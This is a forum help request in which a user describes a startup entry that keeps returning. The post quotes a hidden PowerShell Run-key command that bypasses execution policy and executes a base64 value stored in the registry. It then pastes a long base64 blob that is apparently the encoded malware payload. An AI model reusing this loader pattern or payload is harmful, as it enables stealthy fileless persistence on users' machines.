Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Startup item keeps coming back after disabling it


 • Please log in to reply
6 replies to this topic

#1 jhefreyzz

jhefreyzz

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:08:08 AM

Posted 21 December 2015 - 08:44 PM

Hello I'm so frustrated on how this thing would vanished on my computer system. It keeps checked even though I disabled or uncheck it in the msconfig

here's what I am referring to.

 

Microsoft Operating System  Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FeiSholEpOohbCv').sSqBn)));  HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

I try to delete the registry key but I can't delete it.

Going through the Run registry and found it but it keeps coming back.

 

What should I do.

I scanned my computer already with MBAM, Rogue Killer, Microsoft Windows Defender yet I get no possible virus infection.

 

Moreover I try to reg query it and the result is this:

 

ElDQkcwN05hWjV4RW1FWUJJYVl6NGFMcHVkSUlTcTI2aGt4bXI5bTloQ0ZQSDJreFFCbkRkMThyZEQ2K
0x1UXg4c2J4bEd3ZVk5SXFWMXQvMkJKRmprd1NyWnl1WmxraEtRaUxSMFU3WUk4Y2t5TzdsRGRxbjhle
EsyNERVNWp1WkRSWVl5NjZhckdsdFNwaXVKZm12eUl4Z0c5NXo0Y3V4dTc2d2JXbmtBRnRsVnpBcXcrM
GNTWno4dHBUWWpmNS9xb0N2UXdrWllndXlVS00vZVU2b1NSSE4vY3JuTEZHTnJya2ZxVHRMTTRKeVRtR
kV6RFE2T1hEd0w1dHZmWWlZdGFKTkppWG10VFNtQ2FNTFdnZ1k1cm91Z1NRNW9oaDJZc2cwUjdqVytOO
EhKYXpKVFU5b3JGb0NETTVzV3NWd0RYVXRTTlV4ZEkzM1FqS205c3FQWkRva3RuL2NmODFuK3ByVVhDe
WM2YXAxNDhDcVI0TGlRYy9aYXQrNTZOang3VHI5WnBRODB2VzF4Yk1ETVJPcXJqVU16SVVOK080Zml4S
nIzRHhMYU14ODNTaFhoamdYSFlGNFRpRTdFQ1hzb0pIaFE1NzN2dWFsMEtuVktYY2NWcWVsUms3d1R0V
0dkL09BcU9zNmVHaVd1elN1cWRGSmJXbVVzeXhRdmRheW1CcUFNak1XRGhnOEJUdVl0aU11WVJ5YVdYO
TRxelRlSXFnSzV2T1lkZlkwYmZRSnk2WGRXSjhoZGRia1FEcmsycURhV1lCYzM4WGU1ZTlhRmV4L0JUc
FYwZUZrVGllN3BqQ0w0WTBYY25nQUJSRWFBQTNHbmRyNForTHl1UmIvVFFCUnBWUzMyOHhqazFMMTU4M
zFqekdWbGdXVjZJengvS3hBeXJKWEhKN0Q5TWNhZkFBNVY4bXlOVjRMVmlPVXZENnJBbzREY09XejZDR
nIyR1BSSklSMUE3dW9pNXRWb0FxK3NrRFhnK2txVDBlanUrMXdrU2dQTlNTK1VudFNqSzI5TUJyejZxd
0ZSei81Q1dMT3hwNWhqUGFXVk82U1Q1UTJlZGhvVkllNzZuQy9zQURuQUxncDVQblJiWXRCSHVzZWxCT
nptR1FLNkNDWDZFTFNWdnJPRFFEVVl1ZFZ4SzFpZk4ydWVkRm1RSjVGc1JNOHp3clZrQ3BNWHFWb2lwY
0UyUXJNU1I2NndRL1YraElUcWIvdThNMVVVNUxzOC96MWNtRDZaTzI5eWp0VGI2N1UzMzkxU096WGdOY
U5jUk8yVkhTUTRJdU1lNGs5N0RsUGg5YXJRYkVOQ0V4N1pqNGNUR1Y5TUFEOWI5TXZxWUpVQ3lnRW8xb
lMrRDN3L1V5QVJveGpkUGhqbnZNUktIR29CUmx1ZEVJejAvMlVmbjl1Nmo2ZWorY2x6VmtwNEtRSkU3W
WR3K1NMNEpmenlvRS9qdCtMZlIxK3U5TXR3Mm8ydzBFN1dXaEZvOFMxS3pOYnBMZHhpMWVSWjZSVDlIb
0VQbzBqTkxWTjlGalN4K2lzSC9YS2liajltZU1lUWw0WUNVYzRKMnR4Z0FFcUloNnNjLy95VUQ0NDJiU
FVKdWdkVnlHRjlzQjlLYU96YTF0dHAvd2hIMEhjL2dJUjJ6akN0eDdFdzZQcHJjNHdVTzN0REpCcjdVc
VAxVllITlJUWm11WFFLQWZtMFdEdmVDaHg5Z1RESGlRQ0Jza015TmhROC8yZG13clBzR09vaG1TU0F2a
0JsMnRuK1I5bk5tNEtJSWNpUzc5SUdBankyTG5GejJldXYyeVhuNUF3U1VMV0Q4dk9sUm9lYURrRU05U
WZvT1RVZ1pTRVFxb2toUFhrTXpGZEtxcllSb3lkVXJLMTZyT1pEMDFjS3F2cmxnMWlwT21DeHZMdkFnb
VlzcEJkK2Q1aENwSlVIZ0g4Sjdoa1JXTGZ6c2NvMmRlRHJnSnhHTTZmNTNLb1NHb3d5blZGZVZQMURha
DVIWXREdVk3a2tiS3k2Um9FcjcxU0VZY1hjVEp4Uk1FbENwOFpaNVg0c3FVc0tpVVU2aWY5cEhnZFdTR
Tc5R1padEhEVHFrYkwrRElQRXp6NkZjaCtqM1VZVmdCRnVESzBHYnA2UjkyT3phSmtYdHhaZHR6UFhzV
2F4OU9tVXJMNFR2T29jWGN2VzY5clowY3BNdkVmSjFUbHZhWDVUZW4wYmZYUnFDYUo3OFFDRittQXJMV
WJMbHdrcTViTEZjRkdIakJ1dTE2Si9tdDF4RVlhVmZhU3JadFlJelB6UkpLWk5CUWQ2MXpBQ2FkS29BY
U5aTXIvSitBaFc5U2RZNXkwMnM1TFQveU5zZU9PY3JwQU93cVN3eGZCaXdQMVM2cEVqd25JdjAwUlprO
WNoNFZKR09aZWgwT3VpSmNheHBvcDFLWlRzZTE3QkpyNWRFSURHKy91Smh0VG05YkhwREJvRmhZMkJjL
0VBdnhXQVF3VHpHeTlOR0thWThGblgzT2FRK0t3a05iY1h1dGVOT3BHUkQrSmZlZE9OQnMzZUtqY2dvM
GFsUmlVcThZVFYrMERXN3c1L3BCVW51eU1NWFlPNHJyS1dEaklWU3hMMkd6SVpxVVZsZWs2dlI0OFUvM
lZuRitsTVdtZjIwdnpqU2lEQ3NGWTZMc0o2TXpaL012YnA5cm95ZnoyZGtHUlcvODU4WnpwMGNvNktVV
VYyM0N2SWNmN0FSY3ZLTlNVTmJpdTI1cFBUVFlyQU9HckZzcHB4aFlOVjhnSjBDTTNjK1FYT3BDWDlsU
ElCSXRjVW5PbHpnSXFTNHVsYVNNaG04ZCtZY2xpRmFPUXQ3RU0wWjBUWDFpY3ZCRTFadU1sM1U0ZU1ZM
UpQNlpqb1JpR3pKbTFkZDE0a1hKbDJaRHQxRURrMTh3MGgyT2NwM3dCaFBaRGRONXBET20vVHh5SzNkW
GdVZmZRcXRNbEgwL294c1huMHFQcmxsUTJ0NmltUGNuK1VZZDE0cVBjNDMxbWtFWWxqbGozMDh0T05YW
lFLTkx4OFo5NUNVVHhMenhGeEk0MTFWWURLM09EQVo1U1ZkREVpYmZSSlRteU14TVAyL2p4WDBmbWZZM
mE0cTM1VDZmcU05SXZoNkkrZHhEMUtheHM3ZWhKMUwxeS8raVVPYzVpV1YxcWJPWElzY0tZcTc1eERjU
UxLMktjZWU1R2Y5b0VybXdmb0xWTThvMk83OXZDZVQzUm1vZmxqRHhwRyt6dW9kY2ZyWUhkdHNjeTNtS
3dYc2MrSEp0UXRDeUtvamtzMlhlVVl0cnN3VjZ4T3V0ai9ZL1REelpJVS9PdE9jTkZOTzBPTkFhRlJrN
jdxODAwcnJRbTB6L092Ti9ML01Ra1huNlNrR1pGS2JnNVFodkNNR0oyMG14Yi9uNUl3VU9oZVdYQThjV
DFOSmNGRVczK2VLbkFYbkJnZmhObWlpSmJLaGRacW51czQ2bmRkTVE5TFZzRE5Gc1NEU3VlTEtHM21YW
DlITStSOUUyTVl3VHpiWFVqWVZ4a245S3NNTGNuY0VSUUlhVlhpd2Q2enVTSm5VMmdQYVdaMXVZdW1WS
VJzZnp3TXY3WnNTcnNOd0x0aHpJeFRTdGo5bmJQZjFnQkZnQk44NXYvSjFxZVhpRzZ1MHlILzZJQldQc
XFRTUtXOWExb0NYWTZhbTV0c2xjZGo0bmtZRWNZSTZZaW9QODNEcGVXbStTcVRZREVodG04T3l2bnY3c
HhEVGdMYVhWbzl6V3JJUDdGMVJRSkxvOCtNTE11aUVkZzBLUEJzSW12MFRaQ3VBU2ZuQkZFdENuNWJMY
ndIWnduTnByYkNCcFVNVUhDcWs2QXFta1RuV25Fb2pwbUFtNkM1eWJBNFY1WjlEWmZzS2VlZXJhMHJTU
m5FQ0FsVDdSS3RVaFE1ZWFBeElHeWQvR1BPMVVMTEd3R0wwNHh5bmJpU0pyb2xxcVArczc3LzBvVFhjV
UtRRng1bnhIeXI5ZnV2VDdlMmdMSUZPdXk4QWtESW5LUURZaVk3K1FxM1F5UnhTb1J6bFZ3dGgwUG1uV
3ovcnphS2d6WERSTys3OXV0ZldSSittMlJVaENLYmhXcUVzZ3l4VzRrMVJDSGVyN3BqYmI0Y3g5dUVtR
EdGak9zSDdOY041c0sxb1Z1VkNUdmtPZmhTYkRFOGZITHNvNHYvYUVXdjA5eGYyMUxUdy85YUF5N3ZOb
GovM1BlOEhyZFdqeXJ3c2ZMczVRbkF1MklXTWJUV1JscnFMV1RxTDNId0lrL0JVSS9yWEJSUTNYL1dRd
TYrRkRDZFF6Q3RCVnFETGE2bzVaNTNMVlJHbkxCVHRYRlQrbFV4YnNqQWJHcTZFN0E5N2Y4Zmp2Qzd0N
3lxcjBuUDl5dFdKMWZyMm0xVTRQei9SUmJXZEcrQkluazRnTEVaQ3FzNnMrYVliVUFSckU4TjRBUXRXN
Gl2S09ZK1dEdzNzb01TMjBxMHpFUkNnSG9ZUmtSMm9vQVdIME4rY083d2xXck44Z3NNRXdGT2d3OXVQZ
3YwY1pyRXhuSklOZExXa3g1RFN2WkV1NE5wK1B6VWZYQ2IvSDRsRHJmT1hOek9yWHovTTZYSVE2K2R6M
EN4NitMNy9IcllLWVU4elgwdWl0dk92WGxzT3RpeUhXZVNqZUF0bXZWd3NXRXRoTmFTZEdFcldmaElnT
VlsQVp6b05vWUc5aEpHZW44czkwMkZWZ0hQS211TTI3dm4xODZFQmRWNkxYYTRmWVFkU01KYjNHYzJER
k5ZZlVDeU1nQXF4RnFzWnhPUzhrZkhUN2FRZVJHSmJXZ2VEd0dJZDRJMDd5YWdNR0xNWklzaDd1blI1N
WV4Q053Wlp3UmtoMSt4ZUVZbmVjYWZlaFJ1bFZyd3kraG03UUxxL3hiTDFvT0llaDh3Y3AyZWovaUFXR
2E5WjVXazNuVDlabWxDWDducFkxOUhXNmpDM0xuaDdnTjZYWE5BYTd0eDdKNXN5RGNpVTVXTVNKclhne
m5nVDYydWt4MVlLaFJCbURsU0MwbFNiQldQck1GUHpJSjFHV3lNekl6SjUzM2E1Y0pGdm03bDJIRXZWW
DdLYU9wdnRzdFVWUG9PVVdZeHlXVW9YMld1RGRlWmlwOWxkNnpra1dnZDZIWDBnUm9IMmFiUENtSUxnc
klTR3cvZUZTVHRrZ251VHJKZEFPYmRFTTlvWE4vVjJFV2xJWWh3VllHQUtFNytsRmpOd1I4MStpeVBpO
G5jQWEwWktsTk1WUDQrR3lOSy9qM1pjSjQ4dFE5TXB4VVFCclZxUUIrdFVsbEU1V1cwMnQ4UlEzamZrZ
1R2VkpMTDMzNnVxbXZVYnhycnV2aGtkNC9UK2Ura2tOaU81ZHR1MkVHOFRqNFF3c0E3dTJBVEw3bUtPb
W5pcXgrdUhTcXVXUnlQUEMyOHh1ZFZNbmxyalNnMlZXU242RXhSR0xIeTNIUmcxcUx6WHEwYnFQTENLd
2hOSk43TnlwVk9lVTdCakhFdVpNOVVxMEZ1SHp4MmxRbnEvTXlDZWJVMnBKemFNSmtwRGg4U1VKa3NwV
kFaVE5qRHlXbzVnYnVnWUp2U21CcVBMaThmODRSUnk0N3lIU0VpQ3BpTENDcEQ3czVic0Vad0hjLzZBS
mpCNERVOFNxbGFSMWdiWm0zaHU3L3EyL3VLalcrelpMVjFvQlRJSWd3endVOVI2M3UvWjNGZisvOU1WM
mRpcXVBTGNOWDJ6QzMrSzBPQURhaUVnRWN0SW05eWRBREVQTFlDOUY2eWgzOHoySnQ4N3htNVlmMW5Yd
0l0WkgxV1BzV0x3UEtLeXhNNDlUcG9qTkdyb1BUdmlDWWZZRzJKVkNUN05ITThCMmZKdmFGbjAwQ3lLN
HQ4a3hGUytVeGE5VWRrL2d0anRVUDhsME5nZ1AyamlKQ3V4MEMwUHNmUGFYbnR6czAxUGlwR01BRmVSe
TFzQUYvZ3haaDFEWVlIV24zNXp5VUlaa1VEMVdFbWw0c3hKTFczcHd6SUJzUEg1VEh0UlZreTgwcXFSR
jYvcnFNMEt3VUZmOTBMdkNSZGFJaDF1ODJOemxTUXdJL3c1V3Jydmx6bjhuVUtDUldVWDdlWVdCTXZvY
W1qM2dXUkFlL0t5WkZhVXJJMjQ3aTZsUzhlNVM4YVhXaTZNTjdGNXdmVnoxYVpHVXg3VDZyMVgvVGhLa
2tqRnJrRytIV1RVOHd6Z1pyYjRlWVptVHlYM2VYR2RVdnR0RDgzUkJvRnlNOEZlaUlBTGZRWThiZjFSa
UkzMEhSZ3ZnTUNzR1ZPRzEraDRVTVA2YjBTaHJJb29RZ0F6MjNGZVp5aDQ3c3BnbEJUVnRlMTBKV3l1U
3VxT3loblp6U09IeDgrKzVrOXlIU09HUFhqRkVjdURVTVYzOGRlVEFHVHU1Y0VLL0liZnVWU2R5WG1Da
3REOTVmSkt5bEt3RnRDQlNBYjkweDdwTzVsUll3VzRoYjBML00zUzcyWFV6WlBHbXY2cHZ5MHJ4MUlod
lcwa0d5SWVva1AxU21tQ2RiUkl1Mlg4VVdiZ3pGWlBxVXZwU2h0OG9MTVZlRmZCdy9GSG50VzRKblMxa
EJseE1ZV0Q2b2R6alQ0WVUzYnFJV04rN3BaaG9hZW1QeWRqbVc3dTI2eU1NckI0RkZJRnhSY0lVdEZmc
FZRdnlDdlUxVnM3M0NybW9menRXMGRNK1FoQ2NmME1GYis4SWdTYUlBb1ZybFVTbDZnQytJV1lFNVVSR
VBzZ1hydDNFdGtkVkJHekhESkdCc0I0RmlEcjI2VWhFZHhUNEN5NHZWYUgydURvWFNxUmQvNUVyQ25TM
nN3eThEODhkYktaZmp2dGxjb1o0YjBOUVVpMUw4bkNkQ0RYRWlHVGVpVHliMXNlMXZMa3JaLzExcmZGa
E10blVlNTBZRURLa3M3RndyN2VqV3dGWEphUjZxNUZPcGFncWhHVEhtU2plNnJpT2M2TUVaOE5PVEhFb
i9zM0xIb3dRdDJoL2tod3BTTHFQcmtReVBsc0xrZTVKMms2S3p2QnY5OURPblNvVUVkSnk5anpMbFp3Z
kRpWUtYZHJEYkJuc1NvbS8rZmpQUTMzVDBmWmpmYys1L3F0MWdTWlZndlVESFNiYW5uRzNjNENPVkdRM
GovZGFZNzdQSnlUL3ZzWXdBMWZ1Qloyb29UbWNBT004K01hbDczVFFDSDNJdVYrWkNLVDlMSzJBMnFxe
FFlUTBRaDlxSC95Y2RIMzZlbDdFS3R5M1hXV1RPTzh0TXdVTC9lVkp0d1FkZzJXdW0yTEhCTngxZVl6Q
URpdnU5aW9hUDVkaHUxUVhxbjFmcllxb04xVlFmR2VDblV6K2hOdGNtZ2Z2ZzkvZ3RhdnFVamNUZlMrV
UtvRDZqK3RhZVpScVk3ZEhaS3Fzb1pqSkpNRkNkZ0tjMFRuekd0YnpVejl5eWFtY0RsSW1mdjQ2YlFJN
khmVUNrbnh0dTNhTDV6ejNnL05SazN1KytzMkxkM1ZDd1V2ZVI5UEg2U1hZRzBGN1NYZmkrYWFaWDV1N
nZOWG9jd2RvK2pqOXlocDJwczE4aFVqV1ZmYmdPaFVhUlJCMEJENmg3ODdmY1lNSmd4cFd4LytnMUxic
mp0SENGeHhjeGwxd1k1NVZMNVZ3K2NlamVrY3FIYWdoQWc1c1dvUDVpTEloSUFkVlNmaVlGTHoyd21Xc
3k1Y2JaazBKc3QvSjFhZmY0SDJLWWxSWVBIdnBLRE5ldGJWcmZWcGExZW14Q2phb1FJSjh4VHJaUFZqW
Ww2ZGNKTzhJTEZROFhMVHZjT2RGMituZEFjZDYyUDFOZ1l6ajJsZk9NeGllZ1l1RXBGclBUTDlaQ2Q1S
HFETmZCeWNjMUpDZnFIZzFZNlliVUxzbERHRElFS2o0THR2a3J0WGJ0VnlXN0JqWi9KYXJtQ29wY2xZN
mVtRE1qanJTc0IzcnI0cjRNelR4NElFeHJOOXorQWJpS0dLdCtxZXc5aXlzL1JjTDRrTHNEVnlHa1ovV
DZjakxzd3RSOXNLby9tM3JMOWJxM3dCdWFzVmVjQ2F5QkRJV0NrTTNpSmtQSTB5ZUZKalo2NkRuUVdBd
UIySnJTc1Y2KzJBQmFsMVZYSDdHZmZaODk0S2d5TEQyQXVGOGI3Rnl1Mk9RSWR3ZS8zWHRCbWVadEhpU
XdMNWtxUVkrOC9venJTWTI0MUNGK3pFWlBrMGFqU3RGOTE1azJWbmFNcThJTm5xUExDdE44cEtHeDNqa
3VZbjl3WGNkdHgvK1grYUNtMW1udWhzSUpQb3JCRWVtc1FHZ3diMmtsaXFwNWl4R1BDSnZESmc1MDVDY
2NDZllFU1BwMFNaaXhEUkdsY2pEcFZqS1Nodmlmb3dEaGJhK0JUemllSEVkdVJwYURtU21hdjRYSHV5U
TRnWHBMSEg3QkJKczFhemdqdm5KL2Izc2h4TTh3ZjhFNHc0ZTJCRGNMNDZGM1NkbndLeEZzeURyb29Pa
TljS1NjVHUyd2xPREc0UXBLNDdENDhqM0RhSHgwNmlDMVNwTkJCZDJjVHNmT1U4cnd0eG0wMmdySkZ4a
1FlMWcyRnJ2cXJ4OUZiZHpzc0d5VTl0OUxhQlp1MUxjM1FUT1U0ZDZhUnlGU2loazVDclpva3JvN05sQ
TRXWm4rK0I0NWM0bHFiS256MDF5bm1QemhJcjhSQmFRMUhnd2F2cHZaeGRpOFVaU2lnTllpbDJ2YzB5V
WVWNGs5VFNpUUxJUlovQzNLa215Nk9UWDI2STdwUmIza1lnME1JQW1PYmlCZTdoZEdzNmlTbVpVTnN0a
Ud2ODlYOTNoLzIvYnMxRjlpY01QMlJuNHllMWtlOGxPQjlZMW5PRFAvOU1tUDNyY1duQjdaSXhRUFEze
nc0eHNRZU9MZmZ3eWdKZkpPVXh1dmU2Q3p0YmpKMzFXTnBaakF6c0gxeGRLYUMweWVJK1NBOXZFazNrT
GgvUDBWS2ZsRGhWVXpjZXpRSG1ZSXozL2ozRVpqN1ZzSU4zOUFlbGtHWjJzd3FTOFlGQW1NVEE4N3VCQ
UZBQjY4a25nNVl4UXExSmdscjM5dzZEWDQ2TWQ5S0puSzBoTHc3MmVoZDZla2hSWEgvSGwrUGtxSWNDM
zM3aytuV3pBZ1ZoaXJiTzBYZjhIRTNBeDNJM3hzZ08xMUV2MDZLMjNuVnRLTkkxajVuajBwSFFLaE9aQ
zJudmltS1pLWVJ3NXJSVklzY2EzeWIzanEwbHdVSmg3UjU4VDlLaldqTVRzVnhlL3p5VUZOSU1yOTNTN
lhjSUtIc0R3VERkcDY0R2dEU1dXR0dDcEo4b3RMcjJSSTdaNVJaa0t0OGt6MXFpbDVSU2FLTGRRUVUvT
m1oYzZlOUp2ZkVScnJuZlJlb1ZqaDAzYyt4T0g3SnovS3o4eGhxTGFtOHpzeU5TQlZtYW1ya3hRNm1LY
2hRN3BiOUdxUDRnOEJXSHlLRGZzdVRYS2JuanRMQTR2eFFPODlzc0pCdmR1RFYzZjNXZmx4TE5sQmtUT
VQ3ekVzdXNnQWlaeklESTRwT0o1YVZMZFFBTHFoeDdWNnZza3ZZQUNHZEJENmZ6dFM3RFNnWklydmtpT
2JRYmdrMjZuTEI1WUtSN1pJUVloNFE3M2JKYmJSbWdqaUFHRFdJdVFkaWJGRndrWjh4WU9YUm5EWmkza
C92YndtTDYxc1lTZFRCN01mdW05cnRocUs2b21XdkpPUEszL3QvdlhFRkdhWUw5R2k1Q1liVWxaZW14S
UQvVWtkUk1oOXdCM3g0RW13ejdZN3FZNFJrM2RHemMxNlplZGtZWDdKL0xDQmtGZzcrU0hlazg2d295a
29WRGVLQVRmNmlpS2gvTm40ZnhoWTA3OWFFVit4bWJOdi9KY09CZFBYbTJOcXJBVjZweEJCNzhnSVZMb
Es1cy85ZjRNaTNlOUpRdEJyL0FtUFQvYy9wdHVKNC9LQlZFOWU4NmU5cEZ1Y0p4K3Zhb01lalVwS3JHc
y90MVRtSHJ0NmpCMWNTeE04a2pjc1YxUGpKei9jN1pIVlR5WjJWQTlLMW1sLzFkWDJ6dzhFYVNZR3BFa
FFrZnQ3ZG5QaTd5M0JiTlp6VmZEMGRVSTRzb251SFNaZG5aZm40ZFhSQ2FzQWlzMXFLcXl2VTd3S0k0U
DE1c2xmT3VPSXZxa2d4RzhGWkhKSDR4WUlkOEVVVTY3Vzczck81MDF1VVdtTElkcGJReEpZR3REWHY1T
VJSakprOGxHR1YyOE5wOTEwSy9hQ0dvNlpnRzVVdWhxRHpGZ09ERHpmNnZ1RFBJa25HVkE5dEpYMHFXV
itla216OHFEVXh1YTc1enRmS1BUcEFWOTk1cGNDM2NBV2RiL1NJV0cwMHJDMFo5V2ZWWVJzc1RwREgrc
Edlc3lKaXVXenVrQXRYejd3Y2RTRWo4SjB0aS9VWVNpaFdHVysvYjZUZUxCaGdodytlWHduQjd0VlBCU
lk3M0RFU08vbFpwQmNhUzRrcnRSMjc1N2RzclhGVWxPRXVPbkh3Mmk4UVV2TTJQZ1FsZ2prYUQwRytZc
HlJVU43ODhYenJZdmhsNnZMNFBqSjQyQnROeDRoZlRhZE9iZ1ZiSjhydmdQTXVGUU1UNzFxZ2hqNmZQL
2Uwdm9sbEp0aHN4V2NnTVYwMHBEbmxBaVJTWWoyallIUHloZ3M5RzFFR3hud3ZjclZwdU92cFZ1VzdDM
2hCZHE5TWV5TkVtcDBwN1VNeXdZNHNmbDRZbkluRzFtNWJ5aVhpa2RkU01oRXByc212bDVRdnA5RHFGZ
2VaQnl5ZlR1cE9nYTIrd011MVFtRHdRUGJaS2dzWGloODcvN3RSN3VtYzVGQmlCckJ0MHQ5M2dvemNxd
np6aXlkRi9Na2s4RUJQSGU5OVNLam9IU0UyVnNHNnk5Nk05RGNHYWNnUDkrKy9wVjFqNG1hMng3a0l4a
FlFbVFNWEw4RGovaG5JUzZHMjRQNmpYYzk0ZHZWc0VWMzlFdGZUdGI0V3k5Ylc3S3A3c1REQ1RKSlVSV
XNUTGpCeXljTnhZRHZncEVMYWR3bmtXTndQTTZjZG1ZKy9xTEZBLzBkS1ZvemI3OG1abjUrOWN5ZGU4N
WtvUWtQUUZCN3pXcUVjYStyMHdaLzMyRHhDY1dKWWZGTWkwczlMdHNnK3RlbmsrVUw3RkhoKzBEWHF6U
3VPakVyekt1eXEvdWdKa2FicGxjSkpVV1JvV3VCYmM2b0M4YTRGdG5qa2pZdUVsclFjRkpPbDBWeDZwU
2hvMnhET1hGNHUxZkNDazdTYnc5dlJNdjh1RlYwZUJIWU95Z3RvSjFYelVaNXdZaGMyZDNUMXJ6VG0wT
Gl3NTV2bS9JTXNGSGZEblFYNkN4a1M5UmRqQzVCcE53Uzd2anVhN1ZOQU4xd0kwaWVMVXp6OEJLdWJxT
UZtMWkxTTIwbWNEOXlFWG9NMnBpNmhWL3h0ZXZEc1RxRmVseWRNVlZaQlE0L1ZFaDNFd0JXK0FXZGgvN
UhrZGMzRFlIVDZ1SG1BVHcvQS91ZDB5RWxnL250cnZpZ0g4OFNKU1ExUlptU3p0VFNqbzNWV0lzWnJSV
mVjVzNBckpkbFphejUxR3hGaHJZaDRIYkgwTGlaMUdLcnRMUEEzSTAvWFN2ZkVVSVdjNnV1aFR5R2x6Y
2c1bXhpQlpVZm5QcVZjc0RhcTdHdEVLMXQydmgzSmMxOWhUMERyMnZ0Ky9IRm9LNmZDRmFIalVhSG00c
XpOd2grNTY2dU9BNGM5OXVYenhVdWovT1dYUTNkdHNRNUsvQmlma09BQ04vcEdnSW4yYzJyM2ROaXc5U
UdHdEIxYklQRVplQWJkdldOSjlsMUdLcTdNa1hYdW81ODZETldPRmpGZGlzSTE2alZaalNJUEM5U29XY
1hTL3ZXUlp2L2VQYld2aVNnbWFHc2RDaUNnUExkKy9CdEdoR3FIM0dQS1JRVVNuUU5ZTUpESS93VGEvY
m83cDRacXJ0bkkweXlLSFVOYUZnejNQcVF6OFBRNFBQSjdLVnlFQ2lQREZVL2F4aVcvbEJyckx2UzAvS
y8wVjc2bnZtem8wbDc3bmNXcWRFMFo3VXZ1TEdlT2E3TzgzVDlaSVg0T0I5eldxeS9CLzd4Y21ycUxRN
klyVThXNmNQWERKK0hGVXRtV1E1aDV1V25tenF2VUptNlFXNkhya3FVd1NqeldrQWN5ajRIMTdtZ0VIS
mEyZTg3T3FiSWhFSmZHbmJqM3VrMzQ3MnNqSDhVY1gxajFNWnpvS0UzUEJGTkFKS2s4NkRORG1VZFZXW
G9rYmhxYU1xVklqQ05GTGlqWDdlR1cveEZPd1V3dWZ6UzRPUTRrbkxQSDI0TEhBeXNBRmttdWNPRmo2Y
0pYZjZjbTZRWENZNHVHcEJHQXlXcWxqRmFsU0tNVjVUdXV0d1Q0ZFNkQ05HeXhoV0FleVhzQkFPVnRLb
jF1Wlo3QnRNQmcvVno3NUtybVNERHFiV2p4WkxsMk1oNnl0QnhMdlQwMnlLVGZwdDRERFdTaVpmZHhTc
3crU3dvUUpaTVBjWDJKbFhaY2tKQ1pMVkRDYjU1TWxsVTZGNU41ajdjODlQWTlDc2JQMGF6OEFycGZqR
E1MRHlPbmYzcysrV3M2MjNYVWtIUkVjam1yNEJKb0xtWUxzZ2lNdVN6L1c3dHVzY2lvUm4vR2R2c2xke
nd1Z3BvRTlhZUpFbGhYa2prV2oyRllWOG1pRE5GbW5ZMk5NNzVZSC80U1hPMlJaRDFCWXBLNktYVGRZS
m5SdHhadHgxQU16QzlSSGRhSE5QRnAzdXJOdDZPZ2hIdWExY1JXSVRuR3ZCdEJEUkhaY3ZSdWhVamVHb
mNFVXZDVTkwS2F5SG93MWdoRncxWjVzNmNBc3ZYdG9PQUQ4bDB2bkI4MnljS0lkTVdOVWYyNy9VOGNlZ
jFTYVdIbnk5Q0JFWEl1eVVvNHZnTGl3S2xPT0swc0ZBSU9ocENWTXJhaHpnR2dLOTE2RzJlMG9CZ1U2M
zFxdlRKNmNDWjh4MWlnb1cxUUJwMkNXVXBIWTJ5N0M1RndEZ3V1cXI5YkhELzNjM00vampqUWZlR0pFa
nphSFl2Z0YxNEI2VjFwMkZrMWltRThvOUN1aTZQK3A2UVB5YWhYT0hYcWk0Z2FLUlVoNXdRMkVGWk41T
WVYSHBaM2t1SkhwY2dQVDFWaC9tUkdFR010V2loYm91b0pLYmx3VG9GWmNsRml5Y3hhdUhHZEpYQk9QT
zVzSTEvUXlRdzVzSkV5Z05aUWp1VkhaM0M2U3NxNnZyd1JwbDlXYnJCWXROMHJyM01mU1lKRUVTY0VHT
WtJVE1SRlJLY2tqVkh2Nm5zNS9nR1VpdERSdkZSV3JuUVNsaUgyNmNnSjJaN2FQM2FsQ0pLODdGeXh1T
jhXNVR6MW9LMnV3UW1Gc2tCNVd2c2lLakdrKzNmUWZNNlhiSlVBZzNjNGw3WXh5VEVNUkN6RlpFUHAzc
lJKSmZLcXY5czdQRUtVZW9UbkdZT1Q1NGg3b2kyUVUzZEM0NlBuU3prVFN6dVQzcW9Na1JEMDB4Mi9uW
Dc1bzF2R1FTdTJxTmtBb0RvemZwYlJFdm9SdDkxLy9ldFpIdTNZS21hUEhRNkR1MFlJMUhKaG5NMWl0U
mVBSnR5SzFZbU1uSDJrNGVmci9WeWJXMHNOK25ndHBCSjZrTDdiZTk3UXNrQ25rOG84VzNwTVBVajBBc
GJoeVRicnR0WlVYSDE0RXR6TnBVOVVmRFpIZG5NMjRLRlJhY054cndyRFg1bmN0b0EyUE45QXMzUE04d
3E4YXRPMGd6WXJyRU1zanc1dmhiUFJnMEhScWJpRm1sOUp6Y3JXSERmOWlUZEVPcW94eFViTlk4MXFjT
GRtWXhpYW9BTjhuZGxOMTJaYkJhZzRDSmlkdXg0REJqdmZ5N25PWU1YNy93ZEVoSFZqU2ZLNXd1UFZke
Gh2TzJOYmZnTDg5KzJJQXpXRlc0K0RQcWc5dk5DTWExcWlpc0s0bHBwN0RsWmNFcVJVeURwRTd0V1ovU
zZBL21sVUdaUkY2cDQ4MkpPMFJnczNsRGY3UHNrSjZSTUdYVUw5R2s2a2VsS0N3ZEwxRnZjdDZqVHVVY
TJKY2FaQUF2V1RBeDJoblVyWExtamxhTEN1WnFxYzR6djZrV2hQR2ttNjhzM0wyNXZjM0xqYnJ1TU85L
0VxSFNHQ25ZOTRTd2V2bVBlVzNEQlNqT01hd1llZ3ZOWW5XbmE5WGh6eEYvaGFoTU1sNzlSZUIwQ2tYU
GFIQnBwOXlGdmpSNlM4anp2Z29aMGY4MDhVQXFCWi82ZHFHVmFwUk9PUCtwMTFWTWgwU0ZaSkVXUWw1R
DRxYVFZMUZyUXFwN0xVUWF1MTdlUGxoQjlLbVRMbEcyUkRYSm1kSGs4SHZ1UkE0SGRBcFYxWVFDVzBLU
